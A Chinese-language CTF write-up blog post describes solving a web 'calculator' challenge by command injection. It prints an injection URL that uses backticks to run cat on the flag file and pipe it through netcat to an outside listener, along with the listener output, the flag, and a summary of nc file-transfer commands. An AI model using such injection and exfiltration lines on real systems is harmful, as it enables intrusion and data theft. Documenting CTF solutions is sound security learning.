前言

一共三道web……

第一道没啥好说的

第三道也是python代码审计,记得是过滤了空格、……具体也忘了,空格用注释符绕过,挺简单的就不说了

计算器

就是一个命令行注入

开始尝试fantanshell不成功,尝试nc传输数据成功

http://202.120.7.205:60003/index.php?calc=`cat  there_1s_4_fl4g | nc 123.207.155.221 6668`
[root@VM_129_84_centos ~]# nc -l 6668 > 2.txt   #本地监听结果重定向到2.txt
[root@VM_129_84_centos ~]# cat 2.txt  #查看
index.php
there_1s_4_fl4g


[root@VM_129_84_centos ~]# nc -l 6668   #或者像这样直接监听结果
index.php
there_1s_4_fl4g
[root@VM_129_84_centos ~]# nc -l 6668   #那边执行命令,这边只负责接收结果
ISG{522b28987a79534f8a38b25ebcc474fb}

总结:

nc 传文件
nc -l 6666 > 1.txt  #接收文件
nc 123.207.155.221 6666 < 1.txt

nc -l 6666 < 1.txt  #发送文件
nc 123.207.155.221 6666 > 1.txt

仅有一条评论

  1. 334:

    小辣鸡

    2018-11-18 22:13 回复

preView